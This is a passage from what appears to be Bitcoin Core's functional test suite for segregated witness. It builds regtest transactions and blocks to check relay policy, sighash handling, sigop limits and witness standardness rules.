"""Test validity of future segwit version transactions.
Future segwit versions are non-standard to spend, but valid in blocks.
Sending to future segwit versions is always allowed.
Can run this before and after segwit activation."""
NUM_SEGWIT_VERSIONS = 17 # will test OP_0, OP1, ..., OP_16
if len(self.utxo) < NUM_SEGWIT_VERSIONS:
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
split_value = (self.utxo[0].nValue - 4000) // NUM_SEGWIT_VERSIONS
for _ in range(NUM_SEGWIT_VERSIONS):
tx.vout.append(CTxOut(split_value, CScript([OP_TRUE])))
tx.rehash()
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.utxo.pop(0)
for i in range(NUM_SEGWIT_VERSIONS):
self.utxo.append(UTXO(tx.sha256, i, split_value))
self.sync_blocks()
temp_utxo = []
tx = CTransaction()
witness_program = CScript([OP_TRUE])
witness_hash = sha256(witness_program)
assert_equal(len(self.nodes[1].getrawmempool()), 0)
for version in list(range(OP_1, OP_16 + 1)) + [OP_0]:
# First try to spend to a future version segwit script_pubkey.
if version == OP_1:
# Don't use 32-byte v1 witness (used by Taproot; see BIP 341)
script_pubkey = CScript([CScriptOp(version), witness_hash + b'\x00'])
else:
script_pubkey = CScript([CScriptOp(version), witness_hash])
tx.vin = [CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b"")]
tx.vout = [CTxOut(self.utxo[0].nValue - 1000, script_pubkey)]
tx.rehash()
test_transaction_acceptance(self.nodes[1], self.std_node, tx, with_witness=True, accepted=False)
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=True)
self.utxo.pop(0)
temp_utxo.append(UTXO(tx.sha256, 0, tx.vout[0].nValue))
self.nodes[0].generate(1) # Mine all the transactions
self.sync_blocks()
assert len(self.nodes[0].getrawmempool()) == 0
# Finally, verify that version 0 -> version 2 transactions
# are standard
script_pubkey = CScript([CScriptOp(OP_2), witness_hash])
tx2 = CTransaction()
tx2.vin = [CTxIn(COutPoint(tx.sha256, 0), b"")]
tx2.vout = [CTxOut(tx.vout[0].nValue - 1000, script_pubkey)]
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx2.rehash()
# Gets accepted to both policy-enforcing nodes and others.
test_transaction_acceptance(self.nodes[0], self.test_node, tx2, with_witness=True, accepted=True)
test_transaction_acceptance(self.nodes[1], self.std_node, tx2, with_witness=True, accepted=True)
temp_utxo.pop() # last entry in temp_utxo was the output we just spent
temp_utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
# Spend everything in temp_utxo into an segwit v1 output.
tx3 = CTransaction()
total_value = 0
for i in temp_utxo:
tx3.vin.append(CTxIn(COutPoint(i.sha256, i.n), b""))
tx3.wit.vtxinwit.append(CTxInWitness())
total_value += i.nValue
tx3.wit.vtxinwit[-1].scriptWitness.stack = [witness_program]
tx3.vout.append(CTxOut(total_value - 1000, script_pubkey))
tx3.rehash()
# First we test this transaction against fRequireStandard=true node
# making sure the txid is added to the reject filter
self.std_node.announce_tx_and_wait_for_getdata(tx3)
test_transaction_acceptance(self.nodes[1], self.std_node, tx3, with_witness=True, accepted=False, reason="bad-txns-nonstandard-inputs")
# Now the node will no longer ask for getdata of this transaction when advertised by same txid
self.std_node.announce_tx_and_wait_for_getdata(tx3, success=False)
# Spending a higher version witness output is not allowed by policy,
# even with fRequireStandard=false.
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=False, reason="reserved for soft-fork upgrades")
# Building a block with the transaction must be valid, however.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx2, tx3])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.sync_blocks()
# Add utxo to our list
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
@subtest # type: ignore
def test_premature_coinbase_witness_spend(self):
block = self.build_next_block()
# Change the output of the block to be a witness output.
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
block.vtx[0].vout[0].scriptPubKey = script_pubkey
# This next line will rehash the coinbase and update the merkle
# root, and solve.
self.update_witness_block_with_transactions(block, [])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
spend_tx = CTransaction()
spend_tx.vin = [CTxIn(COutPoint(block.vtx[0].sha256, 0), b"")]
spend_tx.vout = [CTxOut(block.vtx[0].vout[0].nValue, witness_program)]
spend_tx.wit.vtxinwit.append(CTxInWitness())
spend_tx.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
spend_tx.rehash()
# Now test a premature spend.
self.nodes[0].generate(98)
self.sync_blocks()
block2 = self.build_next_block()
self.update_witness_block_with_transactions(block2, [spend_tx])
test_witness_block(self.nodes[0], self.test_node, block2, accepted=False)
# Advancing one more block should allow the spend.
self.nodes[0].generate(1)
block2 = self.build_next_block()
self.update_witness_block_with_transactions(block2, [spend_tx])
test_witness_block(self.nodes[0], self.test_node, block2, accepted=True)
self.sync_blocks()
@subtest # type: ignore
def test_uncompressed_pubkey(self):
"""Test uncompressed pubkey validity in segwit transactions.
Uncompressed pubkeys are no longer supported in default relay policy,
but (for now) are still valid in blocks."""
# Segwit transactions using uncompressed pubkeys are not accepted
# under default policy, but should still pass consensus.
key = ECKey()
key.generate(False)
pubkey = key.get_pubkey().get_bytes()
assert_equal(len(pubkey), 65) # This should be an uncompressed pubkey
utxo = self.utxo.pop(0)
# Test 1: P2WPKH
# First create a P2WPKH output that uses an uncompressed pubkey
pubkeyhash = hash160(pubkey)
script_pkh = key_to_p2wpkh_script(pubkey)
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(utxo.sha256, utxo.n), b""))
tx.vout.append(CTxOut(utxo.nValue - 1000, script_pkh))
tx.rehash()
# Confirm it in a block.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Now try to spend it. Send it to a P2WSH output, which we'll
# use in the next test.
witness_program = CScript([pubkey, CScriptOp(OP_CHECKSIG)])
script_wsh = script_to_p2wsh_script(witness_program)
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_wsh))
script = keyhash_to_p2pkh_script(pubkeyhash)
sig_hash = SegwitV0SignatureHash(script, tx2, 0, SIGHASH_ALL, tx.vout[0].nValue)
signature = key.sign_ecdsa(sig_hash) + b'\x01' # 0x1 is SIGHASH_ALL
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [signature, pubkey]
tx2.rehash()
# Should fail policy test.
test_transaction_acceptance(self.nodes[0], self.test_node, tx2, True, False, 'non-mandatory-script-verify-flag (Using non-compressed keys in segwit)')
# But passes consensus.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Test 2: P2WSH
# Try to spend the P2WSH output created in last test.
# Send it to a P2SH(P2WSH) output, which we'll use in the next test.
script_p2sh = script_to_p2sh_script(script_wsh)
script_sig = CScript([script_wsh])
tx3 = CTransaction()
tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), b""))
tx3.vout.append(CTxOut(tx2.vout[0].nValue - 1000, script_p2sh))
tx3.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx3, 0, SIGHASH_ALL, tx2.vout[0].nValue, key)
# Should fail policy test.
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, True, False, 'non-mandatory-script-verify-flag (Using non-compressed keys in segwit)')
# But passes consensus.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx3])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Test 3: P2SH(P2WSH)
# Try to spend the P2SH output created in the last test.
# Send it to a P2PKH output, which we'll use in the next test.
script_pubkey = keyhash_to_p2pkh_script(pubkeyhash)
tx4 = CTransaction()
tx4.vin.append(CTxIn(COutPoint(tx3.sha256, 0), script_sig))
tx4.vout.append(CTxOut(tx3.vout[0].nValue - 1000, script_pubkey))
tx4.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx4, 0, SIGHASH_ALL, tx3.vout[0].nValue, key)
# Should fail policy test.
test_transaction_acceptance(self.nodes[0], self.test_node, tx4, True, False, 'non-mandatory-script-verify-flag (Using non-compressed keys in segwit)')
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx4])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Test 4: Uncompressed pubkeys should still be valid in non-segwit
# transactions.
tx5 = CTransaction()
tx5.vin.append(CTxIn(COutPoint(tx4.sha256, 0), b""))
tx5.vout.append(CTxOut(tx4.vout[0].nValue - 1000, CScript([OP_TRUE])))
(sig_hash, err) = LegacySignatureHash(script_pubkey, tx5, 0, SIGHASH_ALL)
signature = key.sign_ecdsa(sig_hash) + b'\x01' # 0x1 is SIGHASH_ALL
tx5.vin[0].scriptSig = CScript([signature, pubkey])
tx5.rehash()
# Should pass policy and consensus.
test_transaction_acceptance(self.nodes[0], self.test_node, tx5, True, True)
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx5])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.utxo.append(UTXO(tx5.sha256, 0, tx5.vout[0].nValue))
@subtest # type: ignore
def test_signature_version_1(self):
key = ECKey()
key.generate()
pubkey = key.get_pubkey().get_bytes()
witness_program = CScript([pubkey, CScriptOp(OP_CHECKSIG)])
script_pubkey = script_to_p2wsh_script(witness_program)
# First create a witness output for use in the tests.
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=True)
# Mine this transaction in preparation for following tests.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.sync_blocks()
self.utxo.pop(0)
# Test each hashtype
prev_utxo = UTXO(tx.sha256, 0, tx.vout[0].nValue)
for sigflag in [0, SIGHASH_ANYONECANPAY]:
for hashtype in [SIGHASH_ALL, SIGHASH_NONE, SIGHASH_SINGLE]:
hashtype |= sigflag
block = self.build_next_block()
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(prev_utxo.sha256, prev_utxo.n), b""))
tx.vout.append(CTxOut(prev_utxo.nValue - 1000, script_pubkey))
tx.wit.vtxinwit.append(CTxInWitness())
# Too-large input value
sign_p2pk_witness_input(witness_program, tx, 0, hashtype, prev_utxo.nValue + 1, key)
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Too-small input value
sign_p2pk_witness_input(witness_program, tx, 0, hashtype, prev_utxo.nValue - 1, key)
block.vtx.pop() # remove last tx
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now try correct value
sign_p2pk_witness_input(witness_program, tx, 0, hashtype, prev_utxo.nValue, key)
block.vtx.pop()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
prev_utxo = UTXO(tx.sha256, 0, tx.vout[0].nValue)
# Test combinations of signature hashes.
# Split the utxo into a lot of outputs.
# Randomly choose up to 10 to spend, sign with different hashtypes, and
# output to a random number of outputs. Repeat NUM_SIGHASH_TESTS times.
# Ensure that we've tested a situation where we use SIGHASH_SINGLE with
# an input index > number of outputs.
NUM_SIGHASH_TESTS = 500
temp_utxos = []
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(prev_utxo.sha256, prev_utxo.n), b""))
split_value = prev_utxo.nValue // NUM_SIGHASH_TESTS
for _ in range(NUM_SIGHASH_TESTS):
tx.vout.append(CTxOut(split_value, script_pubkey))
tx.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx, 0, SIGHASH_ALL, prev_utxo.nValue, key)
for i in range(NUM_SIGHASH_TESTS):
temp_utxos.append(UTXO(tx.sha256, i, split_value))
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
block = self.build_next_block()
used_sighash_single_out_of_bounds = False
for i in range(NUM_SIGHASH_TESTS):
# Ping regularly to keep the connection alive
if (not i % 100):
self.test_node.sync_with_ping()
# Choose random number of inputs to use.
num_inputs = random.randint(1, 10)
# Create a slight bias for producing more utxos
num_outputs = random.randint(1, 11)
random.shuffle(temp_utxos)
assert len(temp_utxos) > num_inputs
tx = CTransaction()
total_value = 0
for i in range(num_inputs):
tx.vin.append(CTxIn(COutPoint(temp_utxos[i].sha256, temp_utxos[i].n), b""))
tx.wit.vtxinwit.append(CTxInWitness())
total_value += temp_utxos[i].nValue
split_value = total_value // num_outputs
for _ in range(num_outputs):
tx.vout.append(CTxOut(split_value, script_pubkey))
for i in range(num_inputs):
# Now try to sign each input, using a random hashtype.
anyonecanpay = 0
if random.randint(0, 1):
anyonecanpay = SIGHASH_ANYONECANPAY
hashtype = random.randint(1, 3) | anyonecanpay
sign_p2pk_witness_input(witness_program, tx, i, hashtype, temp_utxos[i].nValue, key)
if (hashtype == SIGHASH_SINGLE and i >= num_outputs):
used_sighash_single_out_of_bounds = True
tx.rehash()
for i in range(num_outputs):
temp_utxos.append(UTXO(tx.sha256, i, split_value))
temp_utxos = temp_utxos[num_inputs:]
block.vtx.append(tx)
# Test the block periodically, if we're close to maxblocksize
if (get_virtual_size(block) > MAX_BLOCK_BASE_SIZE - 1000):
self.update_witness_block_with_transactions(block, [])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
block = self.build_next_block()
if (not used_sighash_single_out_of_bounds):
self.log.info("WARNING: this test run didn't attempt SIGHASH_SINGLE with out-of-bounds index value")
# Test the transactions we've added to the block
if (len(block.vtx) > 1):
self.update_witness_block_with_transactions(block, [])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Now test witness version 0 P2PKH transactions
pubkeyhash = hash160(pubkey)
script_pkh = key_to_p2wpkh_script(pubkey)
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(temp_utxos[0].sha256, temp_utxos[0].n), b""))
tx.vout.append(CTxOut(temp_utxos[0].nValue, script_pkh))
tx.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx, 0, SIGHASH_ALL, temp_utxos[0].nValue, key)
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue, CScript([OP_TRUE])))
script = keyhash_to_p2pkh_script(pubkeyhash)
sig_hash = SegwitV0SignatureHash(script, tx2, 0, SIGHASH_ALL, tx.vout[0].nValue)
signature = key.sign_ecdsa(sig_hash) + b'\x01' # 0x1 is SIGHASH_ALL
# Check that we can't have a scriptSig
tx2.vin[0].scriptSig = CScript([signature, pubkey])
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx, tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Move the signature to the witness.
block.vtx.pop()
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [signature, pubkey]
tx2.vin[0].scriptSig = b""
tx2.rehash()
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
temp_utxos.pop(0)
# Update self.utxos for later tests by creating two outputs
# that consolidate all the coins in temp_utxos.
output_value = sum(i.nValue for i in temp_utxos) // 2
tx = CTransaction()
index = 0
# Just spend to our usual anyone-can-spend output
tx.vout = [CTxOut(output_value, CScript([OP_TRUE]))] * 2
for i in temp_utxos:
# Use SIGHASH_ALL|SIGHASH_ANYONECANPAY so we can build up
# the signatures as we go.
tx.vin.append(CTxIn(COutPoint(i.sha256, i.n), b""))
tx.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx, index, SIGHASH_ALL | SIGHASH_ANYONECANPAY, i.nValue, key)
index += 1
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
for i in range(len(tx.vout)):
self.utxo.append(UTXO(tx.sha256, i, tx.vout[i].nValue))
@subtest # type: ignore
def test_non_standard_witness_blinding(self):
"""Test behavior of unnecessary witnesses in transactions does not blind the node for the transaction"""
# Create a p2sh output -- this is so we can pass the standardness
# rules (an anyone-can-spend OP_TRUE would be rejected, if not wrapped
# in P2SH).
p2sh_program = CScript([OP_TRUE])
script_pubkey = script_to_p2sh_script(p2sh_program)
# Now check that unnecessary witnesses can't be used to blind a node
# to a transaction, eg by violating standardness checks.
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
test_transaction_acceptance(self.nodes[0], self.test_node, tx, False, True)
self.nodes[0].generate(1)
self.sync_blocks()
# We'll add an unnecessary witness to this transaction that would cause
# it to be non-standard, to test that violating policy with a witness
# doesn't blind a node to a transaction. Transactions
# rejected for having a witness shouldn't be added
# to the rejection cache.
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), CScript([p2sh_program])))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_pubkey))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a' * 400]
tx2.rehash()
# This will be rejected due to a policy check:
# No witness is allowed, since it is not a witness program but a p2sh program
test_transaction_acceptance(self.nodes[1], self.std_node, tx2, True, False, 'bad-witness-nonstandard')
# If we send without witness, it should be accepted.
test_transaction_acceptance(self.nodes[1], self.std_node, tx2, False, True)
# Now create a new anyone-can-spend utxo for the next test.
tx3 = CTransaction()
tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), CScript([p2sh_program])))
tx3.vout.append(CTxOut(tx2.vout[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
tx3.rehash()
test_transaction_acceptance(self.nodes[0], self.test_node, tx2, False, True)
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, False, True)
self.nodes[0].generate(1)
self.sync_blocks()
# Update our utxo list; we spent the first entry.
self.utxo.pop(0)
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
@subtest # type: ignore
def test_non_standard_witness(self):
"""Test detection of non-standard P2WSH witness"""
pad = chr(1).encode('latin-1')
# Create scripts for tests
scripts = []
scripts.append(CScript([OP_DROP] * 100))
scripts.append(CScript([OP_DROP] * 99))
scripts.append(CScript([pad * 59] * 59 + [OP_DROP] * 60))
scripts.append(CScript([pad * 59] * 59 + [OP_DROP] * 61))
p2wsh_scripts = []
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
# For each script, generate a pair of P2WSH and P2SH-P2WSH output.
outputvalue = (self.utxo[0].nValue - 1000) // (len(scripts) * 2)
for i in scripts:
p2wsh = script_to_p2wsh_script(i)
p2wsh_scripts.append(p2wsh)
tx.vout.append(CTxOut(outputvalue, p2wsh))
tx.vout.append(CTxOut(outputvalue, script_to_p2sh_script(p2wsh)))
tx.rehash()
txid = tx.sha256
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)
self.nodes[0].generate(1)
self.sync_blocks()
# Creating transactions for tests
p2wsh_txs = []
p2sh_txs = []
for i in range(len(scripts)):
p2wsh_tx = CTransaction()
p2wsh_tx.vin.append(CTxIn(COutPoint(txid, i * 2)))
p2wsh_tx.vout.append(CTxOut(outputvalue - 5000, CScript([OP_0, hash160(b"")])))
p2wsh_tx.wit.vtxinwit.append(CTxInWitness())
p2wsh_tx.rehash()
p2wsh_txs.append(p2wsh_tx)
p2sh_tx = CTransaction()
p2sh_tx.vin.append(CTxIn(COutPoint(txid, i * 2 + 1), CScript([p2wsh_scripts[i]])))
p2sh_tx.vout.append(CTxOut(outputvalue - 5000, CScript([OP_0, hash160(b"")])))
p2sh_tx.wit.vtxinwit.append(CTxInWitness())
p2sh_tx.rehash()
p2sh_txs.append(p2sh_tx)
# Testing native P2WSH
# Witness stack size, excluding witnessScript, over 100 is non-standard
p2wsh_txs[0].wit.vtxinwit[0].scriptWitness.stack = [pad] * 101 + [scripts[0]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[0], True, False, 'bad-witness-nonstandard')
# Non-standard nodes should accept
test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[0], True, True)
# Stack element size over 80 bytes is non-standard
p2wsh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 81] * 100 + [scripts[1]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[1], True, False, 'bad-witness-nonstandard')
# Non-standard nodes should accept
test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[1], True, True)
# Standard nodes should accept if element size is not over 80 bytes
p2wsh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 80] * 100 + [scripts[1]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[1], True, True)
# witnessScript size at 3600 bytes is standard
p2wsh_txs[2].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, scripts[2]]
test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[2], True, True)
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[2], True, True)
# witnessScript size at 3601 bytes is non-standard
p2wsh_txs[3].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, pad, scripts[3]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[3], True, False, 'bad-witness-nonstandard')
# Non-standard nodes should accept
test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[3], True, True)
# Repeating the same tests with P2SH-P2WSH
p2sh_txs[0].wit.vtxinwit[0].scriptWitness.stack = [pad] * 101 + [scripts[0]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[0], True, False, 'bad-witness-nonstandard')
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[0], True, True)
p2sh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 81] * 100 + [scripts[1]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[1], True, False, 'bad-witness-nonstandard')
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[1], True, True)
p2sh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 80] * 100 + [scripts[1]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[1], True, True)
p2sh_txs[2].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, scripts[2]]
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[2], True, True)
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[2], True, True)
p2sh_txs[3].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, pad, scripts[3]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[3], True, False, 'bad-witness-nonstandard')
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[3], True, True)
self.nodes[0].generate(1) # Mine and clean up the mempool of non-standard node
# Valid but non-standard transactions in a block should be accepted by standard node
self.sync_blocks()
assert_equal(len(self.nodes[0].getrawmempool()), 0)
assert_equal(len(self.nodes[1].getrawmempool()), 0)
self.utxo.pop(0)
@subtest # type: ignore
def test_upgrade_after_activation(self):
"""Test the behavior of starting up a segwit-aware node after the softfork has activated."""
# All nodes are caught up and node 2 is a pre-segwit node that will soon upgrade.
for n in range(2):
assert_equal(self.nodes[n].getblockcount(), self.nodes[2].getblockcount())
assert softfork_active(self.nodes[n], "segwit")
assert SEGWIT_HEIGHT < self.nodes[2].getblockcount()
assert 'segwit' not in self.nodes[2].getblockchaininfo()['softforks']
# Restarting node 2 should result in a shutdown because the blockchain consists of
# insufficiently validated blocks per segwit consensus rules.
self.stop_node(2)
self.nodes[2].assert_start_raises_init_error(
extra_args=[f"-segwitheight={SEGWIT_HEIGHT}"],
expected_msg=f": Witness data for blocks after height {SEGWIT_HEIGHT} requires validation. Please restart with -reindex..\nPlease restart with -reindex or -reindex-chainstate to recover.",
)
# As directed, the user restarts the node with -reindex
self.start_node(2, extra_args=["-reindex", f"-segwitheight={SEGWIT_HEIGHT}"])
# With the segwit consensus rules, the node is able to validate only up to SEGWIT_HEIGHT - 1
assert_equal(self.nodes[2].getblockcount(), SEGWIT_HEIGHT - 1)
self.connect_nodes(0, 2)
# We reconnect more than 100 blocks, give it plenty of time
# sync_blocks() also verifies the best block hash is the same for all nodes
self.sync_blocks(timeout=240)
# The upgraded node should now have segwit activated
assert softfork_active(self.nodes[2], "segwit")
@subtest # type: ignore
def test_witness_sigops(self):
"""Test sigop counting is correct inside witnesses."""
# Keep this under MAX_OPS_PER_SCRIPT (201)
witness_program = CScript([OP_TRUE, OP_IF, OP_TRUE, OP_ELSE] + [OP_CHECKMULTISIG] * 5 + [OP_CHECKSIG] * 193 + [OP_ENDIF])
script_pubkey = script_to_p2wsh_script(witness_program)
sigops_per_script = 20 * 5 + 193 * 1
# We'll produce 2 extra outputs, one with a program that would take us
# over max sig ops, and one with a program that would exactly reach max
# sig ops
outputs = (MAX_SIGOP_COST // sigops_per_script) + 2
extra_sigops_available = MAX_SIGOP_COST % sigops_per_script
# We chose the number of checkmultisigs/checksigs to make this work:
assert extra_sigops_available < 100 # steer clear of MAX_OPS_PER_SCRIPT
# This script, when spent with the first
# N(=MAX_SIGOP_COST//sigops_per_script) outputs of our transaction,
# would push us just over the block sigop limit.
witness_program_toomany = CScript([OP_TRUE, OP_IF, OP_TRUE, OP_ELSE] + [OP_CHECKSIG] * (extra_sigops_available + 1) + [OP_ENDIF])
script_pubkey_toomany = script_to_p2wsh_script(witness_program_toomany)
# If we spend this script instead, we would exactly reach our sigop
# limit (for witness sigops).
witness_program_justright = CScript([OP_TRUE, OP_IF, OP_TRUE, OP_ELSE] + [OP_CHECKSIG] * (extra_sigops_available) + [OP_ENDIF])
script_pubkey_justright = script_to_p2wsh_script(witness_program_justright)
# First split our available utxo into a bunch of outputs
split_value = self.utxo[0].nValue // outputs
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
for _ in range(outputs):
tx.vout.append(CTxOut(split_value, script_pubkey))
tx.vout[-2].scriptPubKey = script_pubkey_toomany
tx.vout[-1].scriptPubKey = script_pubkey_justright
tx.rehash()
block_1 = self.build_next_block()
self.update_witness_block_with_transactions(block_1, [tx])
test_witness_block(self.nodes[0], self.test_node, block_1, accepted=True)
tx2 = CTransaction()
# If we try to spend the first n-1 outputs from tx, that should be
# too many sigops.
total_value = 0
for i in range(outputs - 1):
tx2.vin.append(CTxIn(COutPoint(tx.sha256, i), b""))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[-1].scriptWitness.stack = [witness_program]
total_value += tx.vout[i].nValue
tx2.wit.vtxinwit[-1].scriptWitness.stack = [witness_program_toomany]
tx2.vout.append(CTxOut(total_value, CScript([OP_TRUE])))
tx2.rehash()
block_2 = self.build_next_block()
self.update_witness_block_with_transactions(block_2, [tx2])
test_witness_block(self.nodes[0], self.test_node, block_2, accepted=False)
# Try dropping the last input in tx2, and add an output that has
# too many sigops (contributing to legacy sigop count).
checksig_count = (extra_sigops_available // 4) + 1
script_pubkey_checksigs = CScript([OP_CHECKSIG] * checksig_count)
tx2.vout.append(CTxOut(0, script_pubkey_checksigs))
tx2.vin.pop()
tx2.wit.vtxinwit.pop()
tx2.vout[0].nValue -= tx.vout[-2].nValue
tx2.rehash()
block_3 = self.build_next_block()
self.update_witness_block_with_transactions(block_3, [tx2])
test_witness_block(self.nodes[0], self.test_node, block_3, accepted=False)
# If we drop the last checksig in this output, the tx should succeed.
block_4 = self.build_next_block()
tx2.vout[-1].scriptPubKey = CScript([OP_CHECKSIG] * (checksig_count - 1))
tx2.rehash()
self.update_witness_block_with_transactions(block_4, [tx2])
test_witness_block(self.nodes[0], self.test_node, block_4, accepted=True)
# Reset the tip back down for the next test
self.sync_blocks()
for x in self.nodes:
x.invalidateblock(block_4.hash)
# Try replacing the last input of tx2 to be spending the last
# output of tx
block_5 = self.build_next_block()
tx2.vout.pop()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, outputs - 1), b""))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[-1].scriptWitness.stack = [witness_program_justright]
tx2.rehash()
self.update_witness_block_with_transactions(block_5, [tx2])
test_witness_block(self.nodes[0], self.test_node, block_5, accepted=True)
# TODO: test p2sh sigop counting
# Cleanup and prep for next test
self.utxo.pop(0)
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_superfluous_witness(self):
# Serialization of tx that puts witness flag to 3 always
def serialize_with_bogus_witness(tx):
flags = 3
r = b""
r += struct.pack("<i", tx.nVersion)
if flags:
dummy = []
r += ser_vector(dummy)
r += struct.pack("<B", flags)
r += ser_vector(tx.vin)
r += ser_vector(tx.vout)
if flags & 1:
if (len(tx.wit.vtxinwit) != len(tx.vin)):
# vtxinwit must have the same length as vin
tx.wit.vtxinwit = tx.wit.vtxinwit[:len(tx.vin)]
for _ in range(len(tx.wit.vtxinwit), len(tx.vin)):
tx.wit.vtxinwit.append(CTxInWitness())
r += tx.wit.serialize()
